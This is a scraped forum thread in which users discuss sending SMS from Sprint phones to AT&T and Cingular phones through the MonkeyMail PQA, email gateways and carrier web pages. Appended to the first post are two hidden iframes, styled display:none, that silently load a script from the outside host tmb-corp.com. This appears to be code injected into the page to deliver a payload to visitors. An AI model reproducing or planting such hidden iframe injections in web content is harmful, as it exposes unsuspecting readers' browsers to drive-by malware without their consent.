+ Reply to Thread
    User ***** Rulz Enforcer

SMS to other networks

I saw an app called monkeymail that sounds like you can send SMS messages to/from your phone. I especially like the idea of sending messages to phones in other networks:

my sisters have ATT phones, then can send messages to themselves and me! I get their messages. I can't, however, send any messages to them!

I've been trying to get some sort of trial with monkeymail and have started conversations w/ a guy there, who forwarded me to a tech that i haven't heard from yet. Anyone know anything about it?

Is there any software that could take my message and send it to ATT phones? If I knew how to creat a PQA I would, it should be a simple e-mail software like thing:

@mobil.att.net to the phone number and send!

I could do this w/ my sprint mail but that takes time, browsing to it and everything, i want something faster...

anybody,, anybody??

tia

chris<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

so if we were on sprint we could SMS to Cingular/ATT members with this program?
    wow

Administrator

Arrow

this program , if it works, will send a message via online (you will have to make a data call to do this). with traditional sms, you would not have to get online to send one. no one here in the US can send sms messages without making a "data call". the infrastructutre is not in place to make the different networks (tdma, cdma, etc..) be able to talk to each other, unlike europe. the use more sms's than phone calls, although their call plans are higher than ours over here...

SMS Via Email

I use one touch email to check Yahoo and my school pop server. I also can send SMS via email with this program. But you have to have another dailup besides sprint. The sprint server will only allow you to recieve not send using one touch. But aside from this I send SMS to Cingular, ATT, and even Sprint.

Re: SMS Via Email

Originally posted by hanjin
    I use one touch email to check Yahoo and my school pop server. I also can send SMS via email with this program. But you have to have another dailup besides sprint. The sprint server will only allow you to recieve not send using one touch. But aside from this I send SMS to Cingular, ATT, and even Sprint.
    what is the name of this one-toch email? or is this the name of it? and where can I find it. Also my friend tried to send me an sms from her ATT phone. but didn't get it..how did u guys get it to work?

I also tried the MonkeyMail PQA to send pages to AT&T phones (or Sprint phones, for that matter), and could not get it to work. I think it is obsolete. I sent a question to the support email id listed for it, and this was their response:
    MMPQA is obsolete. It was very hard to make money with (and thus
    support) a PQA.
    You can check this post to see some of the other apps I tried to allow you to send messages to other phones / pagers / devices. None of the ones I tried worked. I think the only way to do it is either via email or by browsing to the URL's (such as http://messaging.sprintpcs.com for Sprint) provided by those services and using their web interface to send a message.

It's too bad no simple unified app to interface to these services exists...
    - Dan Butterfield (dan@butterfields.net)